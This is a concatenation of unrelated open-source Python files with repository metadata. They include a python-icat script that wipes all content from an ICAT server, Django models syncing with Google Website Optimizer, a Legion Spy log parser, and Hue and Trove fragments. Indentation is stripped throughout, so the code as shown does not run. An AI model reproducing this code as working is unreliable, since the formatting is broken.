#! /usr/bin/python
#
# Delete all content from an ICAT.
#
# This is surprisingly involved to do it reliably. See the comments
# below for the issues that need to be taken into account.
import logging
import time
from warnings import warn
import icat
import icat.config
from icat.ids import DataSelection
from icat.query import Query
logging.basicConfig(level=logging.INFO)
config = icat.config.Config(ids="optional")
client, conf = config.getconfig()
if client.apiversion < '4.3.0':
raise RuntimeError("Sorry, icat.server version %s is too old, "
"need 4.3.0 or newer." % client.apiversion)
if client.ids and client.ids.apiversion < '1.6.0':
warn("ids.server %s is older then the recommended minimal version 1.6.0."
% client.ids.apiversion)
client.login(conf.auth, conf.credentials)
# Limit of the number of objects to be dealt with at a time.
objlimit = 200
def deleteobjs(query):
"""Delete all objects of matching the query.
"""
query.setLimit( (0, objlimit) )
while True:
objs = client.search(query)
if not objs:
break
# Deleting Study on ICAT 4.4.0 throws ICATInternalError. The
# deletion succeeds though, at least, the Study object is gone
# afterwards. This seem to be fixed in recent ICAT versions.
# As a work around, just ignore ICATInternalError here.
try:
client.deleteMany(objs)
except icat.ICATInternalError:
pass
# First step, delete all Datafiles.
#
# This is somewhat tricky: if the Datafile has been created with IDS
# by a file upload then we MUST delete it with IDS, otherwise it would
# leave an orphan file in the storage. If the Datafile has been
# created directly in the ICAT without IDS, we cannot delete it with
# IDS, because IDS will not find the actual file and will throw a
# server error. But there is no reliable way to tell the one from the
# other. As a rule, we will assume that the file has been created
# with IDS if the location attribute is set.
# Delete all datafiles having location not set directly from ICAT
# first, because they would cause trouble when we try to delete the
# remaining datafiles from IDS, see Issue icatproject/ids.server#63.
deleteobjs(Query(client, "Datafile", conditions={"location": "IS NULL"}))
# To delete datafiles from IDS, we must restore the datasets first,
# because IDS can only delete datafiles that are online. But
# restoring one dataset may cause another one to get archived if free
# main storage is low. So we might need several sweeps to get
# everything deleted. In each sweep, we delete everything that is
# currently online in a first step and file a restore request for some
# remaining datasets in a second step.
#
# Restoring a dataset may fail, in particular, if the files are not
# present in IDS storage, see above. If that happens, we reset the
# error to retry. But we do that only once per dataset. If the
# restore fails again, we give up und delete the dataset from ICAT,
# without considering IDS.
if client.ids:
dfquery = Query(client, "Datafile",
conditions={"location": "IS NOT NULL"}, limit=(0, 1))
retriedDatasets = set()
while True:
deleteDatasets = []
restoreDatasets = []
errorDatasets = []
failedDatasets = []
for ds in client.searchChunked("Dataset", chunksize=objlimit):
try:
status = client.ids.getStatus(DataSelection([ds]))
except icat.IDSInternalError:
if ds in retriedDatasets:
failedDatasets.append(ds)
else:
errorDatasets.append(ds)
continue
if status == "ONLINE":
deleteDatasets.append(ds)
if len(deleteDatasets) >= objlimit:
client.deleteData(deleteDatasets)
client.deleteMany(deleteDatasets)
deleteDatasets = []
elif status == "ARCHIVED":
if len(restoreDatasets) < objlimit:
restoreDatasets.append(ds)
if len(deleteDatasets) > 0:
client.deleteData(deleteDatasets)
client.deleteMany(deleteDatasets)
if len(restoreDatasets) > 0:
client.ids.restore(DataSelection(restoreDatasets))
if len(failedDatasets) > 0:
client.deleteMany(failedDatasets)
retriedDatasets.difference_update(failedDatasets)
if len(errorDatasets) > 0:
client.ids.reset(DataSelection(errorDatasets))
retriedDatasets.update(errorDatasets)
# This whole loop may take a significant amount of time, make
# sure our session does not time out.
client.autoRefresh()
# If any Datafile is left we need to continue the loop.
if client.search(dfquery):
time.sleep(60)
else:
break
# Second step, delete most content from ICAT.
#
# In theory, this could be done by just deleting the Facilities. By
# cascading, this would already wipe almost everything. Practical
# experience show that the object tree related to a single facility
# may be too large to be deleted in one single run, resulting in
# strange errors from the database backend. Thus, we start little by
# little, deleting all Investigations individually first. This
# already removes a major part of all content. Then we delete the
# Facilities which removes most of the rest by cascading. Finally we
# go for all the remaining bits, not related to a facility, such as
# DataCollection and Study.
#
# But we must take care not to delete the authz tables now, because
# with old ICAT versions before 4.4.0, the root user has only
# unconditional write access to the authz tables. For the other
# stuff, he needs a rule in place that allows him access. If we
# remove the authz tables too early, we may take away delete
# permission from ourselves.
authztables = [ "Grouping", "Rule", "User", "UserGroup", ]
alltables = client.getEntityNames()
tables = ["Investigation", "Facility"] + list(set(alltables) - set(authztables))
for t in tables:
deleteobjs(Query(client, t))
# Last step, delete the authztables.
for t in authztables:
deleteobjs(Query(client, t))
|
icatproject/python-icat
|
wipeicat.py
|
Python
|
apache-2.0
| 6,331
|
from django.db import models
import settings
AUTO_PRUNE_MODES = (
('None', 'None'),
('Conservative', 'Conservative'),
('Normal', 'Normal'),
('Aggressive', 'Aggressive'),
)
class GwoExperiment(models.Model):
"""An experiment or test in Google Website Optimizer"""
title = models.CharField(max_length=100)
experiment_id = models.IntegerField(
"GWO Experiment ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
experiment_type = models.CharField(choices=(('AB', 'A/B Test'), ('Multivariate', 'Multivariate')), max_length=15)
control_script = models.TextField(blank=True)
tracking_script = models.TextField(blank=True)
conversion_script = models.TextField(blank=True)
status = models.CharField(default='New', max_length=10, blank=True)
auto_prune_mode = models.CharField(choices=AUTO_PRUNE_MODES, max_length='15', default='None')
test_url = models.URLField(
verbose_name="Test page URL",
verify_exists=False,
max_length=255,
help_text="When testing dynamic pages, select use a URL that uses the template being tested"
)
goal_url = models.URLField(
verbose_name="Coversion page URL",
verify_exists=False,
max_length=255,
help_text="This can be the same as the testing URL. You can trigger a 'conversion' via JavaScript."
)
report_url = models.URLField(max_length=255, blank=True)
configuration_url = models.URLField(max_length=255, blank=True)
class Meta:
pass
def __unicode__(self):
return self.title
@property
def gwo_url(self):
"""
Return the URL represented by the GwoExperimentQuery
"""
from websiteoptimizer import client
return client.ExperimentQuery(self.experiment_id)
def _sync_gwo_experiment(self):
"""
Automatically called by the save method
"""
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
if self.experiment_id:
exp = gwo_client.get_experiment(self.gwo_url)
exp.title.text = self.title
# Google doesn't like it if we change the auto_prune_mode
# exp.auto_prune_mode.text = self.auto_prune_mode
exp.update_test_link = self.test_url
exp.update_goal_link = self.goal_url
exp = gwo_client.update(exp, force=True)
else:
exp = gwo_client.add_experiment(
exp_type=self.experiment_type,
analytics_acct=settings.GWO_ACCOUNT,
test_url=self.test_url,
goal_url=self.test_url,
title=self.title,
)
self.experiment_id = exp.experiment_id.text
self.control_script = exp.control_script.text
self.tracking_script = exp.tracking_script.text
self.conversion_script = exp.tracking_script.text
self.status = exp.status.text
# self.report_url = exp.report_url.text
# self.configuration_url = exp.configuration_url.text
def save(self, *args, **kwargs):
"""
Sync with Google Website Optimizer
The local_only=True keyword argument will prevent syncing the item with
Google Website Optimizer's API
"""
if not kwargs.pop('local_only', False):
self._sync_gwo_experiment()
super(GwoExperiment, self).save(*args, **kwargs)
class GwoAbPageVariation(models.Model):
"""
A Page Variation in an A/B Experiment
"""
gwo_experiment = models.ForeignKey(
GwoExperiment,
verbose_name="Experiment",
limit_choices_to={'experiment_type':'AB'})
appagevariation_id = models.IntegerField(
"GWO AB Page Variation ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
title = models.CharField(max_length=100)
content = models.URLField("Page URL", verify_exists=False)
class Meta:
pass
def __unicode__(self):
return self.title
class GwoSection(models.Model):
"""
A section within a multivariate GWO experiment
"""
gwo_experiment = models.ForeignKey(
GwoExperiment,
verbose_name="Experiment",
limit_choices_to={'experiment_type': 'Multivariate'})
section_id = models.IntegerField(
"GWO Section ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
title = models.CharField(max_length=100)
begin_script = models.CharField(blank=True, max_length=255)
end_script = models.CharField(blank=True, max_length=255)
class Meta:
pass
def __unicode__(self):
return u"%s Section: %s" % (self.gwo_experiment, self.title)
@property
def gwo_url(self):
"""
Return the URL represented by the GwoExperimentQuery
"""
from websiteoptimizer import client
return client.SectionQuery(
self.gwo_experiment.experiment_id,
self.section_id
)
def _sync_gwo_section(self):
"""
Automatically called by the save method
"""
if self.gwo_experiment is None:
return
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
if self.section_id:
sec = gwo_client.get_section(self.gwo_url)
sec.title.text = self.title
sec = gwo_client.update(sec, force=True)
else:
sec = gwo_client.add_section(
self.gwo_experiment.experiment_id,
title=self.title,
)
self.section_id = sec.section_id.text
self.begin_script = sec.section_begin_script.text
self.end_script = sec.section_end_script.text
def save(self, *args, **kwargs):
"""
Sync with Google Website Optimizer
The local_only=True keyword argument will prevent syncing the item with
Google Website Optimizer's API
"""
if not kwargs.pop('local_only', False):
self._sync_gwo_section()
super(GwoSection, self).save(*args, **kwargs)
class GwoVariation(models.Model):
"""
A variation of a section within a multivariate experiment
"""
gwo_experiment = models.ForeignKey(GwoExperiment)
gwo_section = models.ForeignKey(GwoSection)
variation_id = models.IntegerField(
"GWO Variation ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
title = models.CharField(max_length=100)
content = models.TextField(blank=True)
class Meta:
pass
def __unicode__(self):
return u"%s Variation: %s" % (self.gwo_section, self.title)
@property
def gwo_url(self):
"""
Return the URL represented by the GwoExperimentQuery
"""
from websiteoptimizer import client
return client.VariationQuery(
self.gwo_experiment.experiment_id,
self.gwo_section.section_id,
self.variation_id
)
def _sync_gwo_variation(self):
"""
Automatically called by the save method
"""
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
if self.variation_id:
var = gwo_client.get_variation(self.gwo_url)
var.title.text = self.title
var.content.text = self.content
gwo_client.update(var, force=True)
else:
var = gwo_client.add_variation(
self.gwo_section.gwo_url,
title=self.title,
content=self.content
)
self.variation_id = var.variation_id.text
def save(self, *args, **kwargs):
"""
Sync with Google Website Optimizer
The local_only=True keyword argument will prevent syncing the item with
Google Website Optimizer's API
"""
from django.core.exceptions import ValidationError
if self.gwo_experiment != self.gwo_section.gwo_experiment:
raise ValidationError("The experiment and the section don't go together!")
if not kwargs.pop('local_only', False):
self._sync_gwo_variation()
super(GwoVariation, self).save(*args, **kwargs)
def handle_delete(sender, instance, **kwargs):
"""
Send out a delete to GWO
"""
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
gwo_client.delete(instance.gwo_url)
# from django.db.models.signals import pre_delete
# pre_delete.connect(handle_delete, sender=GwoExperiment)
# pre_delete.connect(handle_delete, sender=GwoSection)
# pre_delete.connect(handle_delete, sender=GwoVariation)
|
callowayproject/django-gwo
|
gwo/models.py
|
Python
|
apache-2.0
| 9,424
|
#!/usr/bin/env python
# Copyright 2015 Stanford University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#from spy_state import *
from spy_analysis import *
import sys, re
# All of these calls are based on the print statements in legion_logging.h
prefix = "\[(?P<node>[0-9]+) - (?P<thread>[0-9a-f]+)\] \{\w+\}\{legion_spy\}: "
prefix_pat = re.compile(prefix)
# Logger calls for the shape of the machine
utility_pat = re.compile(prefix+"Utility (?P<pid>[0-9a-f]+)")
processor_pat = re.compile(prefix+"Processor (?P<pid>[0-9a-f]+) (?P<kind>[0-9]+)")
memory_pat = re.compile(prefix+"Memory (?P<mid>[0-9a-f]+) (?P<capacity>[0-9]+)")
proc_mem_pat = re.compile(prefix+"Processor Memory (?P<pid>[0-9a-f]+) (?P<mid>[0-9a-f]+) (?P<band>[0-9]+) (?P<lat>[0-9]+)")
mem_mem_pat = re.compile(prefix+"Memory Memory (?P<mone>[0-9a-f]+) (?P<mtwo>[0-9a-f]+) (?P<band>[0-9]+) (?P<lat>[0-9]+)")
# Calls for the shape of region trees
top_index_pat = re.compile(prefix+"Index Space (?P<uid>[0-9a-f]+)")
top_index_name_pat = re.compile(prefix+"Index Space Name (?P<uid>[0-9a-f]+) (?P<name>\w+)")
index_part_pat = re.compile(prefix+"Index Partition (?P<pid>[0-9a-f]+) (?P<uid>[0-9a-f]+) (?P<disjoint>[0-1]) (?P<color>[0-9]+)")
index_part_name_pat = re.compile(prefix+"Index Partition Name (?P<uid>[0-9a-f]+) (?P<name>\w+)")
index_subspace_pat = re.compile(prefix+"Index Subspace (?P<pid>[0-9a-f]+) (?P<uid>[0-9a-f]+) (?P<color>[0-9]+)")
field_space_pat = re.compile(prefix+"Field Space (?P<uid>[0-9]+)")
field_space_name_pat = re.compile(prefix+"Field Space Name (?P<uid>[0-9]+) (?P<name>\w+)")
field_create_pat = re.compile(prefix+"Field Creation (?P<uid>[0-9]+) (?P<fid>[0-9]+)")
field_name_pat = re.compile(prefix+"Field Name (?P<uid>[0-9]+) (?P<fid>[0-9]+) (?P<name>\w+)")
region_pat = re.compile(prefix+"Region (?P<iid>[0-9a-f]+) (?P<fid>[0-9]+) (?P<tid>[0-9]+)")
region_name_pat = re.compile(prefix+"Logical Region Name (?P<iid>[0-9a-f]+) (?P<fid>[0-9]+) (?P<tid>[0-9]+) (?P<name>\w+)")
partition_name_pat = re.compile(prefix+"Logical Partition Name (?P<iid>[0-9a-f]+) (?P<fid>[0-9]+) (?P<tid>[0-9]+) (?P<name>\w+)")
# Logger calls for operations
top_task_pat = re.compile(prefix+"Top Task (?P<tid>[0-9]+) (?P<uid>[0-9]+) (?P<name>\w+)")
single_task_pat = re.compile(prefix+"Individual Task (?P<ctx>[0-9]+) (?P<tid>[0-9]+) (?P<uid>[0-9]+) (?P<name>\w+)")
index_task_pat = re.compile(prefix+"Index Task (?P<ctx>[0-9]+) (?P<tid>[0-9]+) (?P<uid>[0-9]+) (?P<name>\w+)")
mapping_pat = re.compile(prefix+"Mapping Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
close_pat = re.compile(prefix+"Close Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+) (?P<is_inter>[0-1])")
fence_pat = re.compile(prefix+"Fence Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
copy_op_pat = re.compile(prefix+"Copy Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
acquire_op_pat = re.compile(prefix+"Acquire Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
release_op_pat = re.compile(prefix+"Release Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
deletion_pat = re.compile(prefix+"Deletion Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
index_slice_pat = re.compile(prefix+"Index Slice (?P<index>[0-9]+) (?P<slice>[0-9]+)")
slice_slice_pat = re.compile(prefix+"Slice Slice (?P<slice1>[0-9]+) (?P<slice2>[0-9]+)")
slice_point_pat = re.compile(prefix+"Slice Point (?P<slice>[0-9]+) (?P<point>[0-9]+) (?P<dim>[0-9]+) (?P<val1>[0-9]+) (?P<val2>[0-9]+) (?P<val3>[0-9]+)")
point_point_pat = re.compile(prefix+"Point Point (?P<point1>[0-9]+) (?P<point2>[0-9]+)")
# Logger calls for phase barriers
phase_barrier_pat = re.compile(prefix+"Phase Barrier (?P<uid>[0-9a-f]+)")
# Logger calls for logical mapping dependence analysis
requirement_pat = re.compile(prefix+"Logical Requirement (?P<uid>[0-9]+) (?P<index>[0-9]+) (?P<is_reg>[0-1]) (?P<ispace>[0-9a-f]+) (?P<fspace>[0-9]+) (?P<tid>[0-9]+) (?P<priv>[0-9]+) (?P<coher>[0-9]+) (?P<redop>[0-9]+)")
req_field_pat = re.compile(prefix+"Logical Requirement Field (?P<uid>[0-9]+) (?P<index>[0-9]+) (?P<fid>[0-9]+)")
mapping_dep_pat = re.compile(prefix+"Mapping Dependence (?P<ctx>[0-9]+) (?P<prev_id>[0-9]+) (?P<pidx>[0-9]+) (?P<next_id>[0-9]+) (?P<nidx>[0-9]+) (?P<dtype>[0-9]+)")
# Logger calls for physical dependence analysis
task_inst_req_pat = re.compile(prefix+"Task Instance Requirement (?P<uid>[0-9]+) (?P<idx>[0-9]+) (?P<index>[0-9]+)")
# Logger calls for events
event_event_pat = re.compile(prefix+"Event Event (?P<idone>[0-9a-f]+) (?P<genone>[0-9]+) (?P<idtwo>[0-9a-f]+) (?P<gentwo>[0-9]+)")
implicit_event_pat = re.compile(prefix+"Implicit Event (?P<idone>[0-9a-f]+) (?P<genone>[0-9]+) (?P<idtwo>[0-9a-f]+) (?P<gentwo>[0-9]+)")
op_event_pat = re.compile(prefix+"Op Events (?P<uid>[0-9]+) (?P<startid>[0-9a-f]+) (?P<startgen>[0-9]+) (?P<termid>[0-9a-f]+) (?P<termgen>[0-9]+)")
copy_event_pat = re.compile(prefix+"Copy Events (?P<srcman>[0-9a-f]+) (?P<dstman>[0-9a-f]+) (?P<index>[0-9a-f]+) (?P<field>[0-9]+) (?P<tree>[0-9]+) (?P<startid>[0-9a-f]+) (?P<startgen>[0-9]+) (?P<termid>[0-9a-f]+) (?P<termgen>[0-9]+) (?P<redop>[0-9]+)")
copy_field_pat = re.compile(prefix+"Copy Field (?P<startid>[0-9a-f]+) (?P<startgen>[0-9]+) (?P<termid>[0-9a-f]+) (?P<termgen>[0-9]+) (?P<fid>[0-9]+)")
# Logger calls for physical instance usage
physical_inst_pat = re.compile(prefix+"Physical Instance (?P<iid>[0-9a-f]+) (?P<mid>[0-9a-f]+) (?P<index>[0-9a-f]+) (?P<field>[0-9]+) (?P<tid>[0-9]+)")
physical_reduc_pat = re.compile(prefix+"Reduction Instance (?P<iid>[0-9a-f]+) (?P<mid>[0-9a-f]+) (?P<index>[0-9a-f]+) (?P<field>[0-9]+) (?P<tid>[0-9]+) (?P<fold>[0-1]) (?P<indirect>[0-9]+)")
op_user_pat = re.compile(prefix+"Op Instance User (?P<uid>[0-9]+) (?P<idx>[0-9]+) (?P<iid>[0-9a-f]+)")
op_proc_user_pat = re.compile(prefix+"Op Processor User (?P<uid>[0-9]+) (?P<pid>[0-9a-f]+)")
def parse_log_line(line, state):
# Machine shapes
m = utility_pat.match(line)
if m <> None:
if state.add_utility(int(m.group('pid'),16)):
return True
m = processor_pat.match(line)
if m <> None:
if state.add_processor(int(m.group('pid'),16), int(m.group('kind'))):
return True
m = memory_pat.match(line)
if m <> None:
if state.add_memory(int(m.group('mid'),16), int(m.group('capacity'))):
return True
m = proc_mem_pat.match(line)
if m <> None:
if state.set_proc_mem(int(m.group('pid'),16), int(m.group('mid'),16), int(m.group('band')), int(m.group('lat'))):
return True
m = mem_mem_pat.match(line)
if m <> None:
if state.set_mem_mem(int(m.group('mone'),16), int(m.group('mtwo'),16), int(m.group('band')), int(m.group('lat'))):
return True
# Region tree shapes
m = top_index_pat.match(line)
if m <> None:
if state.add_index_space(int(m.group('uid'),16)):
return True
m = top_index_name_pat.match(line)
if m <> None:
if state.add_index_space_name(int(m.group('uid'),16), m.group('name')):
return True
m = index_part_pat.match(line)
if m <> None:
if state.add_index_partition(int(m.group('pid'),16), int(m.group('uid'),16), True if (int(m.group('disjoint'))) == 1 else False, int(m.group('color'))):
return True
m = index_part_name_pat.match(line)
if m <> None:
if state.add_index_partition_name(int(m.group('uid'),16), m.group('name')):
return True
m = index_subspace_pat.match(line)
if m <> None:
if state.add_index_subspace(int(m.group('pid'),16), int(m.group('uid'),16), int(m.group('color'))):
return True
m = field_space_pat.match(line)
if m <> None:
if state.add_field_space(int(m.group('uid'))):
return True
m = field_space_name_pat.match(line)
if m <> None:
if state.add_field_space_name(int(m.group('uid')), m.group('name')):
return True
m = field_create_pat.match(line)
if m <> None:
if state.add_field(int(m.group('uid')), int(m.group('fid'))):
return True
m = field_name_pat.match(line)
if m <> None:
if state.add_field_name(int(m.group('uid')), int(m.group('fid')), m.group('name')):
return True
m = region_pat.match(line)
if m <> None:
if state.add_region(int(m.group('iid'),16), int(m.group('fid')), int(m.group('tid'))):
return True
m = region_name_pat.match(line)
if m <> None:
if state.add_region_name(int(m.group('iid'),16), int(m.group('fid')), int(m.group('tid')), m.group('name')):
return True
m = partition_name_pat.match(line)
if m <> None:
if state.add_partition_name(int(m.group('iid'),16), int(m.group('fid')), int(m.group('tid')), m.group('name')):
return True
# Operations
m = top_task_pat.match(line)
if m <> None:
if state.add_top_task(int(m.group('tid')), int(m.group('uid')), m.group('name')):
return True
m = single_task_pat.match(line)
if m <> None:
if state.add_single_task(int(m.group('ctx')), int(m.group('tid')), int(m.group('uid')), m.group('name')):
return True
m = index_task_pat.match(line)
if m <> None:
if state.add_index_task(int(m.group('ctx')), int(m.group('tid')), int(m.group('uid')), m.group('name')):
return True
m = mapping_pat.match(line)
if m <> None:
if state.add_mapping(int(m.group('ctx')), int(m.group('uid'))):
return True
m = close_pat.match(line)
if m <> None:
if state.add_close(int(m.group('ctx')), int(m.group('uid')), True if int(m.group('is_inter')) == 1 else False):
return True
m = fence_pat.match(line)
if m <> None:
if state.add_fence(int(m.group('ctx')), int(m.group('uid'))):
return True
m = copy_op_pat.match(line)
if m <> None:
if state.add_copy_op(int(m.group('ctx')), int(m.group('uid'))):
return True
m = acquire_op_pat.match(line)
if m <> None:
if state.add_acquire_op(int(m.group('ctx')), int(m.group('uid'))):
return True
m = release_op_pat.match(line)
if m <> None:
if state.add_release_op(int(m.group('ctx')), int(m.group('uid'))):
return True
m = deletion_pat.match(line)
if m <> None:
if state.add_deletion(int(m.group('ctx')), int(m.group('uid'))):
return True
m = index_slice_pat.match(line)
if m <> None:
if state.add_index_slice(int(m.group('index')),int(m.group('slice'))):
return True
m = slice_slice_pat.match(line)
if m <> None:
if state.add_slice_slice(int(m.group('slice1')),int(m.group('slice2'))):
return True
m = slice_point_pat.match(line)
if m <> None:
if state.add_slice_point(int(m.group('slice')),int(m.group('point')), int(m.group('dim')), int(m.group('val1')), int(m.group('val2')), int(m.group('val3'))):
return True
m = point_point_pat.match(line)
if m <> None:
if state.add_point_point(int(m.group('point1')),int(m.group('point2'))):
return True
# Phase Barriers
m = phase_barrier_pat.match(line)
if m <> None:
if state.add_phase_barrier(int(m.group('uid'), 16)):
return True
# Mapping dependence analysis
m = requirement_pat.match(line)
if m <> None:
if state.add_requirement(int(m.group('uid')), int(m.group('index')), True if (int(m.group('is_reg')))==1 else False, int(m.group('ispace'),16), int(m.group('fspace')), int(m.group('tid')), int(m.group('priv')), int(m.group('coher')), int(m.group('redop'))):
return True
m = req_field_pat.match(line)
if m <> None:
if state.add_req_field(int(m.group('uid')), int(m.group('index')), int(m.group('fid'))):
return True
m = mapping_dep_pat.match(line)
if m <> None:
if state.add_mapping_dependence(int(m.group('ctx')), int(m.group('prev_id')), int(m.group('pidx')), int(m.group('next_id')), int(m.group('nidx')), int(m.group('dtype'))):
return True
# Physical dependence analysis
m = task_inst_req_pat.match(line)
if m <> None:
if state.add_instance_requirement(int(m.group('uid')), int(m.group('idx')), int(m.group('index'))):
return True
# Physical Analysis
m = event_event_pat.match(line)
if m <> None:
if state.add_event_dependence(int(m.group('idone'),16), int(m.group('genone')), int(m.group('idtwo'),16), int(m.group('gentwo'))):
return True
m = implicit_event_pat.match(line)
if m <> None:
if state.add_implicit_dependence(int(m.group('idone'),16), int(m.group('genone')), int(m.group('idtwo'),16), int(m.group('gentwo'))):
return True
m = op_event_pat.match(line)
if m <> None:
if state.add_op_events(int(m.group('uid')), int(m.group('startid'),16), int(m.group('startgen')), int(m.group('termid'),16), int(m.group('termgen'))):
return True
m = copy_event_pat.match(line)
if m <> None:
if state.add_copy_events(int(m.group('srcman'),16), int(m.group('dstman'),16), int(m.group('index'),16), int(m.group('field')), int(m.group('tree')), int(m.group('startid'),16), int(m.group('startgen')), int(m.group('termid'),16), int(m.group('termgen')), int(m.group('redop'))):
return True
m = copy_field_pat.match(line)
if m <> None:
if state.add_copy_field_to_copy_event(int(m.group('startid'),16), int(m.group('startgen')), int(m.group('termid'),16), int(m.group('termgen')), int(m.group('fid'))):
return True
# Physical instance usage
m = physical_inst_pat.match(line)
if m <> None:
if state.add_physical_instance(int(m.group('iid'),16), int(m.group('mid'),16), int(m.group('index'),16), int(m.group('field')), int(m.group('tid'))):
return True
m = physical_reduc_pat.match(line)
if m <> None:
if state.add_reduction_instance(int(m.group('iid'),16), int(m.group('mid'),16), int(m.group('index'),16), int(m.group('field')), int(m.group('tid')), True if (int(m.group('fold')) == 1) else False, int(m.group('indirect'))):
return True
m = op_user_pat.match(line)
if m <> None:
if state.add_op_user(int(m.group('uid')), int(m.group('idx')), int(m.group('iid'),16)):
return True
m = op_proc_user_pat.match(line)
if m <> None:
if state.add_op_proc_user(int(m.group('uid')), int(m.group('pid'),16)):
return True
return False
def parse_log_file(file_name, state):
log = open(file_name, 'r')
matches = 0
# Since some lines might match, but are out of order due to things getting
# printed to the log file in weird orders, try reparsing lines
replay_lines = list()
for line in log:
# Do a quick check to see if we match the prefix
# If not then we can skip the line entirely
m = prefix_pat.match(line)
if m == None:
continue
# If we made it here then we failed to match
if parse_log_line(line, state):
matches += 1
else:
replay_lines.append(line)
log.close()
# Now see if we have lines that need to be replayed
while len(replay_lines) > 0:
to_delete = set()
for line in replay_lines:
if parse_log_line(line, state):
to_delete.add(line)
# Now check to make sure we actually did something
# If not then we're not making forward progress which is bad
if len(to_delete) == 0:
print "ERROR: NO PROGRESS PARSING! BUG IN LEGION SPY LOGGING ASSUMPTIONS!"
for line in replay_lines:
print line
assert False
# Now delete any lines to delete and go again until we're done
for line in to_delete:
replay_lines.remove(line)
return matches
# EOF
|
SKA-ScienceDataProcessor/legion-sdp-clone
|
tools/spy_parser.py
|
Python
|
apache-2.0
| 16,815
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module containing code for sparsity."""
from tensorflow_model_optimization.python.core.api.sparsity import keras
|
tensorflow/model-optimization
|
tensorflow_model_optimization/python/core/api/sparsity/__init__.py
|
Python
|
apache-2.0
| 805
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
import urlparse
import heapq
from desktop.lib.rest.http_client import HttpClient
from desktop.lib.maprsasl import HttpMaprAuth
from hadoop import cluster
LOG = logging.getLogger(__name__)
MAX_HEAP_SIZE = 20
_log_client_heap = []
_log_client_lock = threading.Lock()
def get_log_client(log_link):
global _log_client_queue
global MAX_HEAP_SIZE
_log_client_lock.acquire()
try:
components = urlparse.urlsplit(log_link)
base_url = '%(scheme)s://%(netloc)s' % {
'scheme': components[0],
'netloc': components[1]
}
# Takes on form (epoch time, client object)
# Least Recently Used algorithm.
client_tuple = next((tup for tup in _log_client_heap if tup[1].base_url == base_url), None)
if client_tuple is None:
client = HttpClient(base_url, logger=LOG)
yarn_cluster = cluster.get_cluster_conf_for_job_submission()
client.set_verify(yarn_cluster.SSL_CERT_CA_VERIFY.get())
if yarn_cluster.SECURITY_ENABLED.get():
auth_clients = {'MAPR-SECURITY': HttpMaprAuth}
mechanism = yarn_cluster.MECHANISM.get()
if mechanism in auth_clients:
client._session.auth = auth_clients[mechanism]()
else:
client.set_kerberos_auth()
else:
_log_client_heap.remove(client_tuple)
client = client_tuple[1]
new_client_tuple = (time.time(), client)
if len(_log_client_heap) >= MAX_HEAP_SIZE:
heapq.heapreplace(_log_client_heap, new_client_tuple)
else:
heapq.heappush(_log_client_heap, new_client_tuple)
return client
finally:
_log_client_lock.release()
|
mapr/hue
|
desktop/libs/hadoop/src/hadoop/yarn/clients.py
|
Python
|
apache-2.0
| 2,439
|
# Copyright 2013 Rackspace Hosting
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api as dash_api
from openstack_dashboard.dashboards.project.instances \
import utils as instance_utils
from trove_dashboard import api
LOG = logging.getLogger(__name__)
class SetInstanceDetailsAction(workflows.Action):
name = forms.CharField(max_length=80, label=_("Instance Name"))
flavor = forms.ChoiceField(label=_("Flavor"),
help_text=_("Size of image to launch."))
volume = forms.IntegerField(label=_("Volume Size"),
min_value=0,
initial=1,
help_text=_("Size of the volume in GB."))
